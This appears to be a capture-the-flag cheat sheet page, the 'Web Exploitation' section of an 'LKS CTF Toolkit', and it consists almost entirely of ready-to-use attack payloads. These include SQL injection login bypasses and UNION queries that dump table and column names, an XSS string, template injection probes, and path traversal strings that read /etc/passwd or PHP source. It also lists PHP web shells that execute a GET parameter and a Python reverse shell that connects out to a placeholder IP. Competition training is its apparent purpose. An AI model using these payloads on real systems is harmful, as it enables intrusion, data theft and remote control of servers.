Web Exploitation | LKS CTF Toolkit

🌐 WEB EXPLOITATION ← Dashboard

👮 Authentication Bypass

' OR 1=1--

admin' --

admin' #

' OR '1'='1

🕵️ UNION Based

' UNION SELECT 1,2,3--

' UNION SELECT 1,version(),database()--

' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--

' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--

💉 Basic XSS

javascript:alert(1)

🐍 Jinja2 (Python)

🔧 Java (Spring/Thymeleaf)

${7*7}

*{7*7}

📁 Path Traversal

Linux ../../../../etc/passwd

Linux ....//....//....//etc/passwd

Linux php://filter/convert.base64-encode/resource=index.php

🐘 PHP Shells

Linux <?php system($_GET['cmd']); ?>

Linux <?php echo shell_exec($_GET['cmd']); ?>

🐍 Python Reverse Shell

Linux import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);